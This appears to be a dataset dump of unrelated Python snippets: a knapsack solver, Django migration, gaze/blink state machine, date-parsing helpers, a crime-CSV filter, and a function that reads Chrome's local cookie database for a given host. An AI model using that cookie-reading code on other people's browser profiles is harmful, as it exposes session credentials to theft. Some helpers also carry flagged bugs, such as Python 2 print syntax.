api.add_resource(CategoryApi, '/category' ,'/category/<int:id>', endpoint='category')
api.add_resource(CategoryCollectionApi, '/categorys' , endpoint='categorys')
def mochila(v, p, c, i):
    """0/1 knapsack by plain recursion.

    v -- item values, p -- item weights, c -- remaining capacity,
    i -- index of the last item still under consideration.
    Returns the best total value achievable with items 0..i within c.

    Bug fixed: the original base case `i == 0` returned before item 0
    was ever examined, so the first item could never be chosen.
    """
    if c <= 0 or i < 0:
        return 0
    if p[i] > c:
        # Item i does not fit; skip it.
        return mochila(v, p, c, i - 1)
    # Best of skipping item i vs. taking it.
    return max(mochila(v, p, c, i - 1),
               mochila(v, p, c - p[i], i - 1) + v[i])
# Demo data: item values, item weights, knapsack capacity.
v = [1, 3, 5, 7, 15, 2]
p = [5, 2, 10, 8, 10, 8]
c = 25
n = len(v)
print(mochila(v, p, c, n-1))
def find_it(seq):
    """Return the first value in *seq* (by first occurrence) that appears
    an odd number of times, or None when no such value exists.

    Idiom fix: replaced the hand-rolled dict counting with
    collections.Counter, which preserves insertion order, so the
    returned value is identical to the original implementation's.
    """
    from collections import Counter
    for value, count in Counter(seq).items():
        if count % 2 != 0:
            return value
    return None
# Quick smoke test: -1 is the only value with an odd count here.
print (find_it([1,1,2,-2,5,2,4,4,-1,-2,5]))
# Alternative implementations kept for reference:
# def find_it(seq):
#     for i in seq:
#         if seq.count(i)%2!=0:
#             return i
# def find_it(seq):
#     return [x for x in seq if seq.count(x) % 2][0]
996,695 | ed4796aa9e528b076a2604ee485da490c0cc7e2b | # Generated by Django 2.1.5 on 2019-02-04 15:17
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds eye_choice, modality and study
    fields to cases.Image. Do not hand-edit applied migrations."""
    dependencies = [
        ("studies", "0001_initial"),
        ("challenges", "0017_auto_20181214_1256"),
        ("cases", "0008_auto_20190201_1312"),
    ]
    operations = [
        # Which eye a retina image shows; defaults to "not applicable".
        migrations.AddField(
            model_name="image",
            name="eye_choice",
            field=models.CharField(
                choices=[
                    ("OD", "Oculus Dexter (right eye)"),
                    ("OS", "Oculus Sinister (left eye)"),
                    ("U", "Unknown"),
                    ("NA", "Not applicable"),
                ],
                default="NA",
                help_text="Is this (retina) image from the right or left eye?",
                max_length=2,
            ),
        ),
        # Optional link to the imaging modality; nulled when that row is deleted.
        migrations.AddField(
            model_name="image",
            name="modality",
            field=models.ForeignKey(
                null=True,
                on_delete=django.db.models.deletion.SET_NULL,
                to="challenges.ImagingModality",
            ),
        ),
        # Optional link to a study; PROTECT blocks deleting a referenced study.
        migrations.AddField(
            model_name="image",
            name="study",
            field=models.ForeignKey(
                null=True,
                on_delete=django.db.models.deletion.PROTECT,
                to="studies.Study",
            ),
        ),
    ]
996,696 | a327f0f52ca9570cc50711db28893326d17b6773 | import numpy as np
from queue import deque
class EyeStateManager:
    """State machine turning per-frame (blink, label-probabilities)
    detections into discrete UI events: a new gazed button, and a
    selection confirmed by a run of blinks."""
    # Number of recent probability samples averaged before choosing a label.
    SAMPLES_AVERAGED = 5
    # Consecutive blink frames required to confirm a selection.
    BLINK_THRESHOLD = 3
    # Consecutive identical labels required before the gaze target changes.
    CHANGE_THRESHOLD = 3

    def __init__(self, choose_label_callback=np.argmax):
        self.sample_queue = deque(maxlen=self.SAMPLES_AVERAGED)
        self.last_id = -1          # id of the last detection processed
        self.blink_count = 0
        self.selected_label = None # label currently gazed at
        self.current_label = None  # candidate label being debounced
        self.current_label_count = 0
        self.choose_label_callback = choose_label_callback
        self.selection_made = False    # one-shot flag: blink-confirmed
        self.new_gazed_button = False  # one-shot flag: gaze target changed

    def handle_input(self, detection_id, blink, probabilities):
        """Consume one detection; each detection_id is processed at most once.

        NOTE(review): indentation reconstructed from the flattened dump —
        the blink-threshold check and sample processing are read as living
        in the non-blink branch; confirm against the original file.
        """
        if detection_id != self.last_id:
            if blink:
                self.blink_count += 1
            else:
                # Non-blink frame: clear one-shot flags first.
                self.selection_made = False
                self.new_gazed_button = False
                if self.blink_count >= self.BLINK_THRESHOLD:
                    # Enough consecutive blinks just ended: confirm the
                    # selection and reset the sample window.
                    self.selection_made = True
                    self.blink_count = 0
                    self.sample_queue = deque(maxlen=self.SAMPLES_AVERAGED)
                    return
                self.blink_count = 0
                self.sample_queue.appendleft(probabilities)
                average_probabilities = self.calculate_average_probabilites()
                label = self.choose_label_callback(average_probabilities)
                if label == self.current_label:
                    # Debounce: require CHANGE_THRESHOLD repeats to switch.
                    self.current_label_count += 1
                    if self.current_label_count == self.CHANGE_THRESHOLD:
                        self.selected_label = self.current_label
                        self.new_gazed_button = True
                else:
                    self.current_label = label
                    self.current_label_count = 1
            self.last_id = detection_id

    def calculate_average_probabilites(self):
        """Average the queued probability samples along axis 0.

        NOTE(review): assumes each sample is a 2-D array-like so that
        np.concatenate(axis=0) stacks rows — confirm the detector output.
        """
        all_data = np.concatenate(tuple(self.sample_queue), axis=0)
        return np.average(all_data, 0)

    def get_label(self):
        """The most recently confirmed gaze label (or None)."""
        return self.selected_label
996,697 | c8101ebc443a4a4f0295979ae1f3a7b3594e897c | #!/usr/bin/python
import os
import sqlite3
import requests
def getCookieFromChrome(host='example.webscraping.com'):
    """Read Chrome's on-disk cookie store and return rows for *host*.

    Returns a list of (host_key, name, encrypted_value) tuples; the
    value column is stored encrypted by Chrome, so callers must
    decrypt it separately.
    """
    cookie_path = '/home/hiro/.config/google-chrome/Default/Cookies'
    # Security fix: use a parameterized query instead of interpolating
    # *host* into the SQL string.
    sql = ("select host_key, name, encrypted_value from cookies "
           "where host_key=?")
    with sqlite3.connect(cookie_path) as conn:
        cursor = conn.cursor()
        data = cursor.execute(sql, (host,)).fetchall()
        print(data)
        return data
if __name__ == '__main__':
    # Demo: dump Baidu cookies from the local Chrome profile.
    getCookieFromChrome('.baidu.com')
|
996,698 | b20661b10102ff555ed1895e11df0fee6f93d31f | from datetime import datetime
def reformatDateString(input):
    """Convert 'MM/DD/YYYY' to 'YYYY-MM-DD'; returns None for other input."""
    if input is None or '/' not in input:
        return None
    parsed = datetime.strptime(input, '%m/%d/%Y')
    return parsed.strftime('%Y-%m-%d')
def getTimeObjFromDTString(input):
    """Parse the time portion of a date-time string into a datetime.time.

    NOTE(review): Python 2 print statement below. Also this reads
    date_time_parts[0] (the text *before* the first space) while the
    sibling helpers use parts[1], and '%H:%M%p' mixes 24-hour with an
    AM/PM marker — looks broken for inputs like 'YYYY-MM-DD HH:MM';
    confirm the intended input shape against the callers.
    """
    if input is not None and ':' in input and ' ' in input:
        date_time_parts = input.split(' ')
        if len(date_time_parts) > 1:
            time_string = date_time_parts[0]
            print time_string
            timeObject = datetime.strptime(time_string, '%H:%M%p').time()
            return timeObject
    return None
def getTimeObjFromDTStringAMPM(input):
    """Parse 'DATE HH:MM AM/PM' into a datetime.time, else return None.

    Bug fixed: the original parsed only parts[1] ('HH:MM') with the
    format '%I:%M %p', which also requires the AM/PM token, so
    strptime always raised ValueError. Re-join everything after the
    first space so the marker is included.
    """
    if input is not None and ':' in input and ' ' in input:
        date_time_parts = input.split(' ')
        if len(date_time_parts) > 1:
            time_string = ' '.join(date_time_parts[1:])
            timeObject = datetime.strptime(time_string, '%I:%M %p').time()
            return timeObject
    return None
def getTimeObjFromDTStringSec(input):
    """Parse 'DATE HH:MM:SS' and return the time component, else None."""
    if input is None or ':' not in input or ' ' not in input:
        return None
    pieces = input.split(' ')
    if len(pieces) <= 1:
        return None
    return datetime.strptime(pieces[1], '%H:%M:%S').time()
def getTimeObjectFromString(input):
    """Parse a compact 'H:MMAM' / 'HH:MMPM' string into a datetime.time.

    Examples: '7:30PM' -> 19:30, '12:05AM' -> 00:05.
    NOTE(review): with no AM/PM marker (e.g. '19:20'), minutes[2:4] is ''
    and the string still parses as 24-hour time; a full date-time input
    would break on int(hour). Confirm what callers actually pass.
    """
    print ('getTimeObjectFromString: ' + input)
    #2018-02-08 19:20
    if ':' in input:
        time_pieces = input.split(':')
        # time_string = time_pieces[1]
        hour = time_pieces[0]
        minutes = time_pieces[1]  # e.g. '30PM': two digits + optional AM/PM
        print(hour)
        print (minutes)
        indicator = minutes[2:4].upper()  # 'AM', 'PM' or ''
        second_half_peices = minutes[:2]
        minutes = second_half_peices
        if len(hour) == 1:
            hour = '0' + hour
        if hour == '12':
            # 12 AM is midnight; for 12 PM the +12 below restores 12.
            hour = '00'
        if indicator == 'PM':
            hour = str((int(hour) + 12))
        #print(time_string)
        time_string = hour + ':' + minutes
        time_object = datetime.strptime(time_string, '%H:%M').time()
        # print(time_object)
        return time_object
    return None
def getDateObjectFromString(input):
    """Return the date part of a 'YYYY-MM-DD[ ...]' string as datetime.date."""
    if len(input.split('-')) != 3:
        return None
    date_text = input.split(' ')[0]
    return datetime.strptime(date_text, '%Y-%m-%d').date()
if __name__ == '__main__':
    # Bug fixed: both helpers were called with no arguments, which raised
    # TypeError immediately. Exercise them with sample inputs instead.
    print(getTimeObjectFromString('7:30PM'))
    print(getDateObjectFromString('2018-02-08 19:20'))
996,699 | ed319626f7ba0158ab37eab8c1b185b5c42e8f99 | import pandas as pd
import re
import logging
def badrow(address: str, city: str) -> bool:
    """True when the city token (text before the first '_' in *city*)
    does not appear, case-insensitively, anywhere in *address*."""
    city_token = city.split('_')[0]
    return city_token.lower() not in address.lower()
# logging.basicConfig(filename="spotcrime_scrape.log", level=logging.DEBUG,
#                     filemode='a', format='%(asctime)s %(message)s')
# Mirror log records at INFO+ to stderr with a compact format.
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)

crime_file = './spotcrime.csv.2'
try:
    spotcrime_df = pd.read_csv(crime_file, header=0)
    print(spotcrime_df.head())
except FileNotFoundError:
    logging.fatal(f"{crime_file} not found.")
    # Bug fix: the original logged and fell through, then crashed with a
    # NameError on spotcrime_df below. Exit explicitly instead.
    raise SystemExit(1)
except pd.errors.EmptyDataError:
    logging.fatal(f"{crime_file} had no data.")
    raise SystemExit(1)

print(f"Shape before filter: {spotcrime_df.shape}")
# Consistency fix: reuse badrow() rather than duplicating its inverted
# logic in an ad-hoc lambda.
df_new = spotcrime_df[~spotcrime_df.apply(
    lambda row: badrow(row['Address'], row['Place']), axis=1)]
print(f"Shape after filter: {df_new.shape}")
df_new.to_csv('sc_cleaned.csv', header=True, index=False)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.